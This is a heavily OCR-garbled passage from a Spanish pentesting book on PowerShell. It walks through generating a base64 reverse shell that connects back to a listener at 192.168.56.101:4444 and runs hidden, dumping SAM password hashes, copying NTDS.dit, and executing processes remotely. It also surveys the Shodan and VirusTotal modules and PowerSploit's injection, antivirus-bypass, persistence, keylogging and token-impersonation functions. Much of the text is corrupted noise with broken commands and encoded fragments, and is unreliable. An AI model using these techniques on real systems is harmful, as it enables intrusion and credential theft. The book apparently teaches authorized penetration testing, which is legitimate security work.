a remota intentando evadir algunos controles que 


lve-PathSafe 


3U2QiZVKtx?tNNGUI1GCTt 


/4DAhoF (BdMBgGCS qGS 1b3DQEJA2ELB 
gkghkiG9e8BBuEUH 


Ie PRBZUN GU das OL JNadHPELKqdUX /c4/M9 bJkNo£ NEY3US Th/arp +BRDuxZ LOA RO LEDO 
Uu 1 
YF 
DIXNDUXM10w1wY JKoZ1hucNAQkEMRY EFI NOTU*B7aQNG56VWAKAKESKD 
Z/TekGPHO1vao +41 KNer/MQ08Quigc BJ4sK2u6LI7*aQNnUgIxün34bilgtG 


PhBZ8NiU: e *F5u3bD1 yUNBen1Q/Grn3187 JY2S/3/zSJhhEa421Ph23ck 
ZkiMt FguyDdXEtPfhQDgARMTP 8180FYNdJRu57qBNBu :5MDe4i 


ypsodhpvITU7Kr *ugS4»G9M6kcWUlkEke 
gbuPBgB6 7/rJLKOShu6 GCA igquggIKkBgkqhk Ee HPUCR IUE UMI LCEQI BAT BjjB3MQ 
3 

c id FS c Ú 5 

vM 56 'ow/gqBaaahMs rYKizdN8*V0JKq 7jgsB26U/nKN Je QUI3TNÓeOrGORa3GHDZOarJaPUXHd 195EU06 EGsdp4pi 

do T TT iutRHudJ 1g5s 395 JrgHOHzNoL2Pa/TOkQUGRB3uReueQkSau/3nS *zb9hUnn 4MRoRURARRR 

l "hvtesRead = $Ë ad (Sbuf fer disces à Q0, $bytesfezd) +; : OD DERE 
y s i PoC: Shell inversa, SAM y NTDS con Posh-SecMod 

ne live-PathSafe > ER . 2, : 

funecion Res En esta prueba de concepto se utilizan funciones de post-explotación interesantes para llevar a 
I 

— cabo esta etapa, Conseguir ejecutar una shel! en otras máquinas haciendo movimiento lateral en 

1 


suCQYDUQQGEWJUVZETMBEGA1U 
ECBMKU2FzaGIuZ3Rvu bj Mn 4GO1UEBxMHU ENu« vcaF8aW9uMS EwHwY DUQQDEx 
hNalUNub3NoZnQgUG 

la organización es una de las vías posibles para acceder a otro tipo de información. Este tipo de 
tring) $Path — M: E ; ; . . e ; has 4 

SEDEM PathFromPSPath acciones se hacen bajo la identidad y permisos conseguidos hasta el momento por el pente. 


ster. 


En primer lugar se utilizará la función Get-PostReverTCPShell para generar un código en baseó64 
que en el momento que se ejecute a través de una Po 


werShell proporcionará la invocación de una 
shell que se c 


onectará de forma inversa a un handler que el pentester tendrá configurado. En la 


Pentesting con PowerShell 


EH | o AO 


a generación del código en baseó4 se almacena en una variable 
a través de la invocación de un nuevo proceso de 


imagen se puede visualizar como ! 
1 $shell, siendo Sshell el 


y que posteriormente se ejecuta dich 
PowerShell de la siguiente forma Pow 


nombre de la variable utilizado para almace 
he LinPosh-SecMod-masterP 


o código 
erShell.exe —EncodedCommanc 


nar el código. 


ation? $shell = Get-PostReverICPShe11 


PS Dinlibrosspentesting powers ostExploit 


TCPShell en la posición 1 
ánetros siguientes: 


de la canalización de conandos 


icmdlet Get-PostRe 

roporcione valores para los par 
HOST: 192.168.56.101 

PORT: 4444 ^ 

$ itátion> $shell 

AMQANADSAIAAKAHAAD 

MA bA BpAGUAbgBOACAA 

s fionaQBnR CA KQR KRH 

GuAbuBzAGUAKAA p 


AECAZQBBAFMAdAB y! HOAdWBvAHIAaw 
AGOALGECAHKAJABL AHQALIBSAGUAY w 
A ANQAZOBLACIARAB AGEA 


QBZAHMAIANJACART BIAHCALQBP 


ización de —Windows. Este 
un proceso 


a shell inversa es la util 
n proporciona al pentester 
a siguiente forma PowerShell. 


o interesante en la ejecución de 1 
orciona diferentes valores, el cual hidde 
a en la máquina. La ejecución quedaria de 1 
Window Hidden. 


Un parámetr 
parámetro prop 
ejecutando de forma ocult 
ü exe -EncodedCommand Sshell 
a shell y para ello puede utilizar, 
escuchando por el 
la conexión a una 


oger la conexión que genera | 
handler o sencillamente un neical 
igurado la shell para que devuelva 
o handler de Metasploit estará escuch 


por ejemplo nc 4 -p 4444. 


Por otro lado, el penrester debe rec 
as cosas, el módulo exploit/multi 

En el ejemplo se ha conf 
puerto 4444, por lo que el módul 
ocurre en el caso de utilizar nefcal, 


entre otr 
puerto adecuado. 
dirección IP y al ando en ese 


puerto. Lo mismo 
exploit/multi/handler dónde 


vs/shell/reverse tcp. 


Yfiguración básica del módulo 
load utilizado, en este caso windo 


En la imagen se puede visualizar una cor 
se indica la dirección IP, el puerto y el pay 


xploitAmulti/handler. 


» 


Fig. 3.29: Configuración de e 
lecoder para poder pasar de 
os decoders online 
magen la función 


igo en base64? Se puede utilizar un c 
almente se está ejecutando. Existen vari 
omo se puede visualizar en la it 
legible y entendible. 


¿Qué es lo que está detrás del cód 
base64 a String y ver el código que re 
en utilizar para llevar a cabo esto. C 


que se pued 
ll genera un código totalmente 


Get-PostReverTCPShe 
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`j 2entester ili 
i y este; puede utilizar este código como base p 
- ii 


tipo de pav " : ara hacer sus "S 
i payloads que después puede pasar a base ara hacer sus modificaciones, e incluso cr 
- 2 » € e 


ABhAGQAZAB 
yAGUA 
YALGAXADAAMQARADSAIA 
MADE 
AdQBuAGMAdAB 
pAG8Ab 
AAKAAKAGMADA! 
UACOAgAC no 


zACAAPQAnADEAOQA 
" yAC4AMQA2A 
AKAHAAbwByAHQAIAAJACAAJWADA DOARA DAD 


gAgAGMAbABIAGEAb 
x 9B1AHAAIAB7 
bgBÜACAAQWBvAGAAbgBIAGMAdADIAG GAIA AS 


j 


M 
Sclient = New-O 


Sclient connect(Saddress pon) ^ ^'^ 
am() 


New-Object S , 
ELA, AS, >ystem.Bytel $5 1 " " r 
Object System Drao p ak ReceiveBufferSize 


fo.FileName = $env ComSpec 


Snetworkbuffer — 
Sprocess 7 Nev 
Sprocess Startin 


Fig. 3.30: » ? le based moe 
ig. 3.30: Decodift cación de base64 a Stri 
Ot a funci d Jer- J į 7 I | J, [ 
5 lones lteresar (S : 
santes s 1 y ' 1 
c SO C et Pc stHasl du jz AC ipt y ( € A IC 
nteres 2S SOI 1 HD A POS 0] YNT S. c | 
ras ) 3.1 AD ; 1 prin ra de 


ellas S a c “ eli din: - CLR 
5 genera codigc que e V v 
rene ] y se le > i ] rm 
i " . y ; ° 
J ] ció 
genera un digo se ( be cenar er 1 ) que 18 SU ejecució 1, de lorma 


` € 0 y] € e c l JS / y de 
simitar a como se hizo anterior ente, pro CIO 
. I F OrCIC 1 un volca lo t os usu 
I ] ] S usuarios y tashe 1 
y C as AM 


E volc c d C » c € e € 
( jue se ealiz 
ado I 1 proporciona el ne mb c de usu 
ha: c Sua c € i 
rash N i ( usuario I ira jode evar : 
Ú ministrador en el proceso, vac 
id d 


ari , el C t [ é y 
c cado d usua i l / 
10) l ] 1 i 1 i rde u: IO el Ac. EL 
a cabo este y olcac 0 el penteste 0 h ; 


> ue si no se R r debe tener pr . ; 

se lleva ac tica | o se obtendrá un acces er privilegio de 

acabo de la siguiente forma Shashdumy á un acceso denegado. L g e 
k po 


a generación del código 


Get-PostHashdumpScript. 


> $hashdu a 

x Shashdunp Get-PostHashdumpScript 

sion.Def lateStre 5 

: san <$ (Neu-Obje 
021416xtduksiin e«b28 ZCPS 
munbvuntCacb dou onde Gs OPun 
SqPkha9 qUPXGUvvOR NT ypz ut 
AMA bvd/E*o3t9ZonP9 7. DA 
puog/xukbrdUbPUA iGSKS Ln «pee cup E E ie 13208 SEA 
; UBPUA iGS Kin «Zo +U9P JAVA IL UC OST JE Gonn 
L - DO E 


Fig. 3.31: G 
8. 3.31: Generación de códi 
A TE 
go para realizar el hashdump 


La inst iÓ 
- Mstrucción que ejecute 
1que ejecuta realmente el volcado de has) í 
rashes es] owerShell. ex 


Com > 

O se puede 4 . 
visualiz y o —(. " 
alizar en la im e-Command Shashdump 


los h ” i 
i i nb ue ; agen se obtiene > i 
CN. E: a iný nación puede ser ili | - ^ es : : s : este 
Sel utilizada pare un po. te io C} k l | a : á : 
Tackeo c el a. A | M i éste 
asnes sta MOIT [9] ) > Se 1 1 ster A iV]. S1 es 


estuviera habi It I Zar una impers 1al acio de S 
l ado 
5 Q pa a reali; a 
[ OI 
S zacion u 


Doo. 
Pass the Hash " 
arios, por ejemplo con técnicas 


64 y ejecute sis 
e. t d € tro 
Jecutar como se ha mencionado anteriormente 

1 Htc. 
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į > se encuentra en 
i ia del fichero NTDS.dit que se 
sn Ger-PostCopyNTDS permite realizar una copia del ficher 
La función Ger-Pos yn dod 
ontroladores de dominio de la organizacio | MM 
Aqui almente 
" uinas, generalme dil mei 
y acceso a estas maq i pem 
eaquep udin función con el fin de realizar una Copia 
osi e 

en una PowerShe 


los c 


j i | . j l i "ME 
S | " LIMP: SecM ' m € ostExoloitation? vowe e xe -Command $hashdunp 
E i 1 > vouershell.exc ;0mma y 
a - sk :cMod-naster*P xn ation? " ie z du 
):NlibrosNpentestina jowershe 1INPosh 9 95313f 59d7e c 889c8: : - 
S E ibrosNpe 


:31 d6cfefdifae931b73c 


; d 3fb:-: 
o ada! caad3b435h51404ce 7e 
Administrador 2 1b435b514804eeaad3b4 DEL : 
MCN eM SHE: ochoa mastersPostExplo 
; :ntestin 
S D:nlibrosspentes 


itation? 
i 
g powershe 11*Po 


Fig. 3.32: Obtención de usuarios y hashes. 


ite ejecutar un proceso remoto, 

ión Start-PostRemoteProcess permite ejecutar pa eia 
n ar qué queremos ejecutar en r à ] 

eigens de ejecutar en remoto a través de 


Por ültimo, la utilización de la ^ 

Lo interesante de esta función — e n il 
i shell inversa y S 

si se genera una 


e ivi 10 necesario. 
ta función siempre y cuando se tenga el privileg ] VER 
l | 3 0. TC. She —LHOST direcció 
a función seria milara etP Rever TCI —- P: 

“s E 8shell GetPos " t > PA 
; P iere - ICOSS ComputerName «direccion IP o nombi ] 

e) 283 — 

rt- ostRemoteF roc 


z sl p e ede i et-Ci edential)]. Se pone 
E Credential (Ge € 1 
Il.ex e EncodedCommand S: rell f [ ; ^ | i J i 


La ejecución de est 
-LPORT <puerto>; Sta 
1 "PowerShe 
-Command “Power i i s 
entre corchete la parte de la credencial, y 


memoria necesaria O no. 


Servicios externos | — 

-Mod proporciona diferentes módulos que p ipfi 
voii fiip term Nessus, VirusTotal o Shodan. En 
entornos c 1 ? 


p p b A de 
ro orcionadas por los módulos de Vii s Total y Sho mn 


entester interactuar vía API con 
rtado se estudiarán las funciones 


ir cesibles 
sli-Shoa Posh-VirusTotal, ac 
ido puestos en otro proyecto llamado Posh-Shodan y 
> an sido puestos 
Estos módulos han s à; 
ji kOperator. | 

K ib de DarkOpera | m | 

mm ster las funcionalidades necesarias para 


— vés de las tipicas 
Las funciones de Shodan proporcionarán al; tenus dieti 2 


büsquedas avanz adas obre maquinas que se en uentr an expu 

e q >` p : : en su itio E / adan. iO. 

E 
consult is que se ueden realizar S snc 
e D p £ ua 3 
y? 
til zar la: funciones hay que dis 
F ara ut S oner de una 11 IKey la c | en el caso de S 10dan se puede 
cons eguir desde el sitio web creando una cuenta. 
` t fu ciones e p . 

continuación se enun eran las dif 

A 1 Ss erentes inciones con una breve descri ción 


Descripción i 
para un posterior uso 
arla por pantalla 


Almacena el valor de la APIKey 
| contenido de la 4P7Key sin mostr 


Read-ShodanAPIKey Accede a 


l 
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Descripción 


Devuelve información sobre la cuenta de la APIKey. Un 
ejemplo sencillo sería almacenar la APIK, ?v con la función 
Set-ShodanAPIKey y al recuperar la información de la cuenta 
con la función Get-ShodanAPlInfo se puede ejecutar la 
siguiente instrucción Get-ShodanAPlInfo —-APIKey (Read- 
ShodanAPIKey) 

Enumera el listado de servicios disponibles 


Devuelve información sobre una dirección IP. Los datos 
que pueden ser devueltos son el sistema operativo, puertos 
abiertos, organización a la que pertenece, ISP, tipo de 
protocolo de transporte, etcétera. Su ejecución es Ger- 
ShodanHostService -APIKey «valor? -IPAdd; 
IP» 


Esta función permite realizar büsquedas sobre la base de 
datos de Shodan en busca de máquinas. Las büsquedas son 
tan flexibles como las querys que se pueden hacer a través del 
sitio web, pudiendo realizar büsquedas de banners, puertos, 
sistemas operativos, regiones, geolocalización, etcétera 
Proporciona una forma de medir los resultados de las 
consultas. En otras palabras, si se realiza una büsqueda sobre 
hosts, por ejemplo de Zabbix, se obtiene el resultado de 
ocurrencias. Un caso particular sería ejecutar la instrucción 
Measure-ShodanHost -Query "zabbix " 


Get-ShodanAPlInfo 


Get-ShodanHostService 


'ess «dirección 


Search-ShodanHost 


Measure-ShodanHost 


Realiza resolución de nombres de dominio a través de la base 
de datos de Shodan 
Realiza resolución inversa de direcciones IP a través de la 
base de datos de Shodan 
Devuelve la dirección IP desde dónde el usuario se conecta 
Esta función permite realizar büsquedas sobre la base de 
datos de Shodan en lo referente a vulnerabilidades y exploits 
disponibles. Esta función es realmente interesante para poder 
tener acceso a una gran cantidad de exploits 
Permite medir el nümero de ocurrencias de exploits con 
una query personalizable en función de las necesidades del 
pentester 


Get-ShodanDNSResolve 


Search-ShodanExploit 


Tabla 3.21: Funciones del módulo Shodan en Posh-Shodan. 


À continuación se m 


uestran las funciones del módulo de VirusTotal, el cual se 
0sh-Virus Total: 


puede encontrar en 


n iÓt—s np nnn 
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o EE A 


Chequea la versión del módulo de VirusTotal que se 
encuentra instalado y la versión del que se encuentra en 
Github 
ación de la APIKey almacenada 
previamente 


Get-PoshVTVersion 


Recupera inform 


Recupera un reporte de VirusTotal para un dominio dado 


Recupera el reporte que indica el comportamiento de un 
fichero al ser ejecutado en una sandbox. Para esta función se 
debe disponer de una APIKey privada 
Recupera los comentarios de otros miembros de la 
Comunidad sobre el recurso solicitado 


Get-VTFileBehaviourReport 


Recupera un dump del tráfico de red generado por un 
fichero ejecutado 


Get-VTFileNetworkTraffic 
Recupera un reporte básico de VirusTotal sobre un recurso 


a un fichero a través de su hash 


Descarg; 
Recupera los resultados de un escaneo para un archivo 


Recupera un reporte de VirusTotal almacenado para una 


dirección IPv4 


Recupera una dirección URL especial para subir archivos 
más grandes de 32 MB de tamaño 


Recupera un reporte de } irusTotal a través de una dirección 
URL proporcionada por el pentester 


Elimina un scan programado 


Realiza búsquedas de binarios que marc hean con otros 
binarios, metadatos o criterios 


Configura el valor de la APIKey para que se pueda utilizar 
sin necesidad de indicarla implícitamente en cada ejecución 
de funciones 


Permite subir un comentario sobre un fichero o dirección 
URL 


Lanza un escaneo o programa un escaneo para ser lanzado 


más adelante 


escaneada por Virus Total 
is Total 


Sube una muestra para ser 


Sube una dirección URL para ser escaneada por Viri 


Tübla 3.22: Funciones del módulo VirusTotal en Posh-VirusTotal. 


Ot a d > ] sf ( i es ) S a 
E C las fun 101 i j 
mportante: ar 4 ili 
que se I antes para un pe ntest utilizando Shodan es Se 


E PowerShell 
apitulo III. PowerShell puro: El arte de | pentesting 


( . y V I t " L I ow ` 
E > z b le "| 'epto se » “ena elo l i d Í > AQ ] > 7, " 
2 dia p c I o se muestra dive S > > & í O 
n z ruepa de concep u an TSOS ejer p!os de uso € Iunciones de Odd! I 
aves del u C la / d ar l S. I M q I c q p? > e « v i 
1 trave d l so de la Al I e nbos i a le ecord 11 ue 11 


que disponer " A a poder utilizar se EPA 
l poner de una AP/Key, la cual se puede conseguir cre a poder utilizar estas funciones hay 


gni a og ando una cuenta en cada servicio. 
Udemm dnm - Be HOW cc id la cual recupera 
iae d zm "— En un pentest, una vez conocid 

g pueden pasarse por este servicio para consultar la 


información de una dirección 
as todas las direcciones IP de una 
información disponible en Shodan. 


PS D:NlibrosN sti 
e —APIKey ventesting powershellNPosh-Shodan—master> G 
y73UNU —IPAddress et-ShodanHostSeruic 


CA 
1347448072 
658 


205282229222229296 
$2008 e—-public-dns-a.qoogle.com? 
807 
us 
caorle 
Cip=134'744072;5 i 
271347 ; isp-G : "ans 
CM Pu id 
ciscnanes Sustonm.OhjectL]; a vs 
Cinestanp-2015-07-31111:86:11.123120; 
ins-Sys .ObjectI1; ‘g= : 
ts-; str- A c i : STI 
Mg, eredi g-Google; os-; _shodan=; 
ountain Uie: 
Google EM 
pe eaba 
ÜSAS 07-31T11:M6:11.123120 
nited States 
8.8.8.8 Mes 


«535 


data- 


longitude 
last update 
countru code3 
country name 
1p str 

os 

ports 


Fig, 3.33: R ji 
2, 3.33: Recuperaci > infor, I 
iperacion de infor mación de un host concer "fc Shol 
vePero en òNodan 


Una nanera sencilla de jasar ) S la d re lones It de una org 
n ill d I 
> Jasar toda p 
g S5 CCIC * O 


por este servicio 1 anizació 
j o de forma : AA JE ganización, una vez descubi 
Get-ShodanHostServi iutomática sería la siguiente car «fichero con di i dc 
: ostService —4PIKev <anik 3 E 1 direcciones IP — 

e -APIKey <apikey> -IPAddress $_} ciones 1P> | foreach | 


Lo únic e sc S S : 
-0 unico que se debe do 
e tener en cuenta es que se tiene que crear un fiel ] 
e chero de te 


IP. una dir A 
. una direcc - 1; > , y " 
cción por línea en el fichero. xto con las direcciones 


puede obtener infi anii P E o ; x 
btener información sobre vulnerabilidades y exploi arch-ShodanExploit, ya 
ades y expiotfs. E 


En la ¡ 

: image ede visuali 

pi a n se puede visualizar como se realiza una búsqued 

um jix ldap”. Existen otros paráme n 
: BID, MSB, platform, type o pue 


ia tarie i a para encontrar matches con la 
s que se pueden realizar búsquedas c "p 
rto. ` s como CFE, 


Emo jd 
| Gholl 
Pentesting con Powersnetl 


h-ShodanExploi 
sh-Shodan-master? (Search: s 
IPS D:nlibroswoentestina nowershellwPosh Bhoden m "zabbix ldap">-matche 
-fiPIKey 
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\pentesting povershe TINPosh-=Shodan=master> Measure 


=ShodanHost 


JNU -Query "ssh-2.8 veOnlyDo 2.1.3" 


total 


8327 


: CUE 
ource : - ; - se 1.8.16 and 2.x 
id : nem i36 login function in Zabbix Pons to override LDAP 
description : Im useaa brci allows remote attackers 

efor .8. 


i "ameter. 
configuration via the cnf parame 


Fig. 3.35: Medición de hosts encontrados en Shodan con una condición determinada 


En la siguiente imagen se puede observar cómo se realiza una subida de una muestra a VirusTotal 
o para que se pueda analizar. La función de subida de archivos Submit-VTFile devuelve información 
$008:2013-13645 a que se puede obtener 
al también se puede visualizar en la 


püblica, sobre el análisis. 


sobre el hash, el identificador del escaneo. el identificador de recurso con |] 
<? 


después más información. La función Get-VTFileReport, lacu 
CUE — 
201a 2.8 5 allows remote authenticated use 
= a Y. 


= sole 
x saging management-conso 
ehe LEES passnore a E password value in the HTML 


diode imagen, permite recuperar el reporte con toda la información. 
rs to 1s 
D:NIibrosNpentesting povershe 
.NPsExec.exe —APIKey 
aBd56fe7hb4d538 


access and reading tł 
source code. 


€ 3b88535b4addi94f£5661e1131c8e81 
£CUE-2813-5572> 
<> 


af373ca3220cf669674cf1272895e 
5cab95-14385394M3 


b5c62d79eda4f 7e4b68a9caa5736a3f dc2£1b27e 
resource ab09535b4add194£5661e1131c8e81a£373ca322c£669674c£1272095e 
1! ` h <<S 5cab95 
-master? 1..108 i foreac it 1 

ES vershel1APosh-Shodan-=ma 3UWU -Platform mu 
PS D:NlibrosNpentesting pot y E 370» 
parch ShodanExploit LA ere-Object 4S. id -eq 1837 


IPesponse code 


¿raro 3Shdadd194F5661e1131c8eB1af373ca322cf669674cf1272095e 
cab9 


https://www.virustotal.com/file/3b88535b4addi94f5661e1131c 
8e81af 373ca322cf669674c£1272095e5cab95/analusis/1438539483 


permalink 


php 5.3.8 - Multiple Vulnerabilities 


d5 
Maksymilian Arciemowicz 


Y 
a7f'2a0£74c8h48£1699858hb3b6c11eda 
erbose msg 


Scan request successfully queued, come back later for the 
report 


nuit 101^ 14100:00:00+90:00 
42012-80781» 

dos 

B 


PS Di y Libros wentesting powershellNPosh-VirusTotal-master> Get-UTFileReport 
APT Key 


hesource 3588535b4addi94f5661e1131c8e81af373c 


= BCBkav-; MicroUorld-eScan-; nProtect-; CRT-QuickHeal-; 
Mcüfee-; Malwarebytes=; Zillya=; SUPERAntiSpyvare=; 


1d538 
a322cf 669674cf1272895e5capb95 


; 
; hodan 
Bi la de loi través de Shodan 
Fig. 3.34: Búsqueda de exploits a [rave 


j ié a búsqueda recursiva por 
ejecución de una büsqued: [ 


a se puede visualizar la BAS 
En la segunda parte de la imagen se puede visual ados de las búsquedas a 


ay que entender que los result a 
ive siempre la página 1, per 
.100 | foreach 


1 : M 
liferentes páginas devueltas por Nom. x lefecto, se devue 
d S PSS diues * defecto, s 

TOT ran paginados. Por de 2 Eiecncié 
través de la API se encuentran paf yle script. En este caso, la ejecución l. 


A Sissi m 1 thore ie 
pueden solicitar el resto de páginas con un Sim! -Page $ ).matches] | Wher -Object 


i ; dtip 
/ eh-ShodanExploit -APIKey apikey? -I latform multipk 
US. ud cer 36157 ue se revisen las 100 primeras p MR 
Emb detis taforma. Una vez que los resu eem 
la vulnerabilidad con identificador 36137. 
Como nota indicar que 


áginas de resultados devueltos por 


hodan para analizar todas las vulnerabilidades multipla 
Shodan para analizar tote — 
) se realiza la da c 
“analizando a Where-Object se realiza la búsque dpi 
Este j iginas y tratamiento c sultados 
Este es un buen ejemplo de manejo de páginas y tratamıs 
os a ie «on Windows o Linux. 
Platform puede ser diversa, por ejemplo con Win: EN 
| j Y ^s Measure- 
ba de concepto sobre el módulo de Shodan es ( ^ 
rucba C S à; i pie 
i a imagen se puede visualizar una büsqt 
"in iqui ienen comc 
iltados de máquinas que tienen € E 
as 


La ültima función que se trata en um Į ——— 
ShodanHost, là cual permite medir los resu ados. iie 
Ms ot ra obtener e 'ro de re: pA 
«ealizada sobre la base de datos para obtener el pape A Risque i pem 
Pose d lgü to. la frase ssh-2.0 weOnlyDo 2.1.3. Estas maquinas tueg 

banner, en algún puerto, la trase 555-2." | 


unción Search-Shocdt St. 
y procesadas con la función Search-ShodanHc 


K?üntiUirus-; BitDefender-; K?GU-; TheHacker=; 
NANO-Antivirus=; F-Prot-; Symantec=; 
TrendMicro-HouseCall-; fivast-; 
filibaba-; fignitum- i Rising 
fid-huare-; Sophos- H DrUeb-; UI 
TrendMicro=; McAfee-GW-Editio Emsisoft=; Cyren=; 
Jiangmin-; flviras; fintiy-RUL Kingsoft-; Microsoft-; 
Arcabit=; flegisLab-; GData= fhnLab-U3-; AlYac=; flUuar 
UBA32=;5 Baidu-International-; Zoner-; Tencent-; Ikarus 
Fortinet-; AUG=; Panda=; Qihoo-360-» 
3b88535b4add194f5661e1131c8e81af373ca322c£669674cf1272895€ 
5cab95—1438494966 


b5c62d79eda4f 7e 4b68a9caa5736a3£dc2£1hb27e 
2588535b4addi94£566101131c8681af373ca322c£669674c£1272095e 
cab9 


ky=; 


1 
2815-08-82 05:56:06 
https ://www.virustotal 


-con/file/3b88535b4addi94f5661e1131c 
8e81af373ca322cf 669674 
Y 


cf1272895e5cab95/analusis/1438494966 
Scan finished, information embedded 
5 


1 


ab0535b4addi94£566161131c8e81a£373ca322c£669674c£1272095& 
5cab9 


:a22f730f24c8b48£1699959 


Fig. 3.36 Subida de muestra para análisis y 


b3b6c11e 


recuperación de información de Virus Total 


E Pentesting con PowerShell 


5. PowerSploit 


PowerSploit son un conjunto d 
algunas fases de la explotación, pero so 
intrusión. PowerSploit se ha dividido en dos r 
diferentes scripts con un objetivo distinto. 


e módulos que proporcionan una colección de funciones ütiles para 
bre todo para las fases de post-explotación en un test de 
amas diferenciadas en la que se pueden encontrar 


La rama clásica es PowerSploit y se puede encontrar en la siguiente dirección URL https://github. 
com/mattifestation/PowerSploit, mientras que PowerSploit Arsenal o PowerShell Arsenal puede ser 
rShellArsenal. 


encontrada en la siguiente dirección URL hitpsz//github.com/mattifestation/Powe 
a un conjunto de módulos para llevar a cabo ejecuciones 
n de información y manipulación de ésta, gestión de la 
lla de scripts en la máquina víctima, 


La rama clásica de PowerSploit proporcion 
de código, evasión de antivirus, recopilació 
persistencia en una fase de post-explotación, manipulación senci 


etcétera. 

ódulo utilizado para ayudar con la ingeniería inversa. El 
blar ficheros, realizar análisis de malware .NET, análisis 
ación interna de los sistemas. 


Por otro lado PowerShell Arsenal es un m 
módulo puede ser utilizado para desensam 
de memoria, parsear diferentes formatos y obtener inform 


Las funcionalidades que son proporcionadas por PowerSploit se pueden enumerar en la siguiente 


lista: 
ta categoría proporcionan la vía 


- Code Execution. Las funciones que se encuentran en es 
tive PE Injection o la ejecución 


para ejecutar código, ya sea a través de DLL Injection, Reflec 
de una shellcode. 
- Script Modification. Modifica 


comprometida. 
- Persistence. Una funcionalidad interesante en un pentest, y que en otros frameworks de 


PowerShell no se encuentran. Estas funciones permiten al pentester disponer de la posibilidad 
de volver acceder al equipo o de ejecutar diferentes acciones a través de scripts programadas 
en el tiempo. En resumen, genera persistencia en el equipo comprometido. 

- Antivirus Bypass. Ayuda a realizar bypass sobre los antivirus. Solo hay una función en 
esta categoría, la cual permite localizar firmas sencillas utilizando el mismo método DSplit 


con la clase 101. 


- Exfiltration. Esta categoría proporciona al pentes 
sobre la máquina comprometida, hacer inyección de credenciales, realizar copias shadow, 


por ejemplo de ficheros bloqueados por el sistema, configurar un keylogger, realizar un 
mini volcado de memoria, conseguir screenshots en remoto, etcétera. Una categoría muy 
interesante para la post-explotación. 


- Mayhem. Esta categoría dispone de 2 fu 
La primera puede modificar el Master Boot Record y la segunda provoca un p 


para provocar un volcado de memoria RAM. 


u optimiza la ejecución de scripts sobre una máquina 


ter funciones para ejecutar un Mimikatz 


nciones las cuales manejan estructuras críticas. 
antallazo azul 


Dí 


T 
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Recon. Esta í 
t categoría proporciona funci 
de recopilació F na funciones que pueden a 
ón de in “e > ser utilizadas i 
formación. Algunas funciones proporcionan resolución en la - 
inversa de 


Las categorías que son proporcionadas 


continuación: por PowerShell Arsenal son las "TA 
a 


Disassem i 
-- ibly. Estas funciones desensamblan código nativo y gestionado 
- alware Analysi. i úti i 
E ~ lysis. Herramientas útiles cuando se realiza un análisis de mal 
- emory Tools. Funcio i vena 
Mere ra: nes que permiten al pentester realizar un análisis de pr 
: oria y de la información que se alberga en ella — 
arsers. Permiten parsear estructuras en memoria 


- Windows Internals. 


Obtienen i ; 
à an r3al 3 22 
dedu, y analizan a bajo nivel información sobre el sistema 


- Misc y libraries. Funciones y librerías de a 


ingeniería inversa en PowerShell. yuda para mejorar la experiencia de la 


Code Execution 


Esta categoría es 
una de å ; " 
A DRIE A iA " den llamativas, ya que la ejecución de código en un sistema si 
n del usuario. La ejecución de código a través d MR Lid 
e estos 


ventajas, ya que la evasi : Sei : 
as ` ? script z 

ión de mecanismos de seguridad es algo prioritario en un test dei hon UUA 
e intrusión. 


módulo: 


ones j 
nes que pueden ser ejecutadas a través de este 


Descripción 


c Á— inyecta una shellcode dentro de un proceso 
Icado, siempre y cuando se t i 
ndicad enga el mismo o superi 
or 
lee o en el propio entorno de la consola de ent 
. La shellcode que se inyecta es un windows/meterpreter/ 
reverse https 
Pra una shellcode dentro del contexto en el que se eje- 
uta la PowerShell sin utilizar ninguna llamada a ol 
Win32 


Inyecta una DLL dentro de un proceso seleccionado por el 

usuario 

pes un archivo Windows PE (DLL o EXE) en el proceso 
e PowerShell o inyecta una DLL en un proceso remoto 


Tabla 3.23: Funciones de Code Execution en PowerSploit. 


Invoke-Shellcode 


Invoke-ShellcodeMSIL 


Invoke-DllInjection 


Invoke-ReflectivePE Injection 


O  — |. A ?QDO-" |J. . | 
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Script Modification 


A r má apercibido, cifrar 

-esario generar EncodedCommand para pasar más desap poh 
ein Imacenarlos en disco o comprimir archivos para su p 

us esultar ütiles una vez el pentester se encuentra 


En algunas ocasiones e 
el contenido de ciertos scripts para a — 
ejecución. Estas pequefias modificaciones p 

en la máquina comprometida. 


: sdulo: 
i ejecutadas en este módulo: 
En la siguiente tabla se muestran las distintas funciones que pueden ser ej 
n la sigui 


Remove-Comments 


Descripción 

i ‘ript 

Elimina los comentarios y espacios en blanco de un scrip 

i cri, de ser 

Cifra el contenido de archivos o scripts. «> xà x 
interesante si se quiere almacenar en un ma - eme 

información referente a, por ejemplo, una ca eis d ; 

datos obtenidos que quieren ser enviados a tra : 
etcétera 
encodea en Base64 y genera una salida en formato 


Encoc edCommand a cual uede Ser ejecutada a trave de 
la instr ucción l OWe! Shell.exe —EncodedC ommand sá ida 


generada> 
"yc - : 

encodea en Baseó4 y genera un código para cargar un 
managed DLL en memoria 


Out-EncryptedScript 


Comprime, 


Out-EncodedCommand 


Comprime, 


Script Modification en PowerSploit. 


Tabla 3.24: Funciones de 


Persistence 

La persistencia es vita 
un momento programado en e 
comprometida previamente. 


dad de poder ejecutar código o un script en 


S s. La posibili ipt 
iia: eee entest a recuperar el control de una maquina 


| tiempo puede ayudar al p 


Descripción 
Configura diferentes opciones relacionadas nh 
persistencia para que puedan ser utilizadas por 
Add-Persistence 
entes opciones relacionadas con la 
levación de acciones 


New-UserPersistenceOption 


Configura difer 
persistencia y la e — 
A : e 

Crea persistencia en el sistema de un scri 


New-ElevatedPersistenceOption 
" - ^ sider 
DT NENNEN Instala una DLL que aporte un SSP. Security Support Provi 
Enumera todos los SSP cargados 
Ger-SecurityPackage. 


Tabla 3.25: Funciones de Persistence en PowerSploit. 


pi 
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Exfiltration 


Las funciones de esta categoría son utilizadas para mostrar y manipular información del sistema 
comprometido a través de PowerShell. Son funciones importantes que pueden ser utilizadas durante 
el pentest para conseguir capturas de pantallas, realizar pivoring de procesos, gestionar copias de 
archivos bloqueados por el sistema, captura de pulsaciones, etcétera. A continuación se muestra una 
descripción de las funciones que integran el módulo. 


Función 


Descripción 


Esta función requiere de permisos de administrador. Permite 
enumerar y gestionar los diferentes token que pueden existir en 
el sistema operativo. Es una función muy potente en la post- 
explotación, además. permite realizar pivoting entre procesos. 
Por ejemplo, se puede ejecutar un proceso con cierto privilegio 
y después realizar la captura de sus pulsaciones, juntando la 
impersonalización de tokens con la función de keylogging. Dos 
ejemplos sencillos son Invoke- TokenManipulation -Enumerate 
y Invoke-TokenMenipulation —ImpersonateUser -Username "nt 

authorityvlsvstem " 


